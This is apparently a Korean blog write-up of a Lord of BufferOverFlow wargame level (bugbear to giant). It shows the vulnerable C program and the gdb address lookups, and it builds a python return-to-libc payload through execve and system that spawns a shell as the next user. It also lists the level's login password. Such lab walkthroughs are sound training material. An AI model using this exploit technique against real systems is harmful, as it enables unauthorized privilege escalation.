본문 바로가기
Write-Up/LOB(lord of bufferoverflow)

[Lord Of BufferOverFlow] 14번 bugbear -> giant

20's 2021. 3. 4. 00:10

login : bugbear

password : new divide

 

[bugbear@localhost bugbear]$ cat giant.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - giant
        - RTL2
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(int argc, char *argv[])
{
        char buffer[40];
        FILE *fp;
        char *lib_addr, *execve_offset, *execve_addr;
        char *ret;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // gain address of execve
        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "(%x)", &lib_addr);
        fclose(fp);

        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");
        fgets(buffer, 255, fp);
        sscanf(buffer, "%x", &execve_offset);
        fclose(fp);

        execve_addr = lib_addr + (int)execve_offset;
        // end

        memcpy(&ret, &(argv[1][44]), 4);
        if(ret != execve_addr)
        {
                printf("You must use execve!\n");
                exit(0);
        }

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
}

 

구해야할것

1. execve함수의 주소

2. system, exit함수의 주소

3. "/bin/sh"의 주소

 

(gdb) b *main
Breakpoint 1 at 0x8048560
(gdb) r
Starting program: /home/bugbear/test

Breakpoint 1, 0x8048560 in main ()
(gdb) p execve
$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb) p system
$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$3 = {void (int)} 0x400391e0 <exit>

[bugbear@localhost bugbear]$ cat getaddr.c
#include <stdio.h>
#include <string.h>

int main(){
        long system = 0x400a9d48;
        while (memcmp((void*)system, "/bin/sh\x00", 8)){
                system++;
        }
        printf("/bin/sh: %x\n", system);

        return 0;

}
[bugbear@localhost bugbear]$ ./getaddr
/bin/sh: 400fbff9
[bugbear@localhost bugbear]$ ./giant "`python -c 'print "a"*44 + "\x48\x9d\x0a\x40" + "\xe0\x8a\x05\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaH▒
@▒@▒@▒@
bash$ whoami
giant
bash$ my-pass
euid = 514
one step closer

 

'Write-Up > LOB(lord of bufferoverflow)' 카테고리의 다른 글

[Lord Of BufferOverFlow] 16번 assassin -> zombie_assassin  (0) 2021.03.06
[Lord Of BufferOverFlow] 15번 giant -> assassin  (0) 2021.03.04
[Lord Of BufferOverFlow] 13번 darkknight -> bugbear  (0) 2021.03.01
[Lord Of BufferOverFlow] 12번 golem -> darkknight  (0) 2021.03.01
[Lord Of BufferOverFlow] 11번 skeleton -> golem  (0) 2021.02.27

'Write-Up/LOB(lord of bufferoverflow)' Related Articles

티스토리툴바